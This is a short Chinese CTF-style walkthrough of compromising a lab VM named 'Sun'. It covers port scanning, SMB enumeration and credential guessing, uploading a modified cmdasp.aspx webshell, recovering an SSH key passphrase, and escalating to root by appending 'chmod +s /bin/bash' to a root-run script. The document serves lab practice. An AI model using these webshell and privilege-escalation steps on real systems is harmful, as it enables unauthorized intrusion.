# 靶场搭建
下载:Sun
Nat,IP: 192.168.1.144
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 a9:a8:52:f3:cd:ec:0d:5b:5f:f3:af:5b:3c:db:76:b6 (ECDSA) | |
|_ 256 73:f5:8e:44:0c:b9:0a:e0:e7:31:0c:04:ac:7e:ff:fd (ED25519) | |
80/tcp open http nginx 1.22.1 | |
|_http-server-header: nginx/1.22.1 | |
|_http-title: Sun | |
139/tcp open netbios-ssn Samba smbd 4.6.2 | |
445/tcp open netbios-ssn Samba smbd 4.6.2 | |
8080/tcp open http nginx 1.22.1 | |
|_http-server-header: nginx/1.22.1 | |
|_http-title: Sun | |
|_http-open-proxy: Proxy might be redirecting requests |
NT_STATUS_CONNECTION_REFUSED listing \*
//192.168.1.144/IPC$ Mapping: N/A Listing: N/A Writing: N/A
//192.168.1.144/nobody Mapping: DENIED Listing: N/A Writing: N/A
S-1-5-21-3376172362-2708036654-1072164461-501 SUN\nobody (Local User)
S-1-5-21-3376172362-2708036654-1072164461-513 SUN\None (Domain Group)
S-1-5-21-3376172362-2708036654-1072164461-1000 SUN\punt4n0 (Local User)
80 端口没有什么线索,图片应该是需要分离的, binwalk --dd='.*' sun.jpg --run-as=root 分离出来的东西不会处理 ==、G
无法访问 nobody 的文件夹,想办法枚举账号密码了
smb_login 模块拿到: punt4n0:sunday
看一下 nobody 有啥
┌──(root㉿kali)-[~] | |
└─# smbclient //192.168.1.144/nobody -U punt4n0 | |
Password for [WORKGROUP\punt4n0]: | |
Try "help" to get a list of possible commands. | |
smb: \> dir | |
. D 0 Tue Apr 2 04:55:21 2024 | |
.. D 0 Mon Apr 1 12:43:11 2024 | |
index.html N 263 Tue Apr 2 04:54:36 2024 | |
sun.jpg N 98346 Tue Apr 2 04:49:44 2024 | |
19480400 blocks of size 1024. 15768912 blocks available | |
smb: \> |
网站目录,那 OK 了.NET 的网站,传马
将 /usr/share/webshells/aspx/cmdasp.aspx
中 11 12 行适配 linux
psi.FileName = "bash";
psi.Arguments = "-c "+arg;
传上去访问就是一个 exec 的点,弹 shell 就可以了。
发现是 punt4n0 的身份,看一下目录发现有 id_rsa 和 passphrase
稳了
# 提权
使用 id_rsa 登录终端, 'cat .remember_password' 中有需要的 passphrase Th3_p0w3r_0f_IIS
收集信息发现了 /opt/service.ps1
ssh 传一个 pspy 上去看看是不是有定时任务(wget 用不了,所以我走的 ssh
确实有,就是这个 service.ps1
echo 'chmod +s /bin/bash' >> service.ps1 后等待 /bin/bash -p
拿到 root 权限!
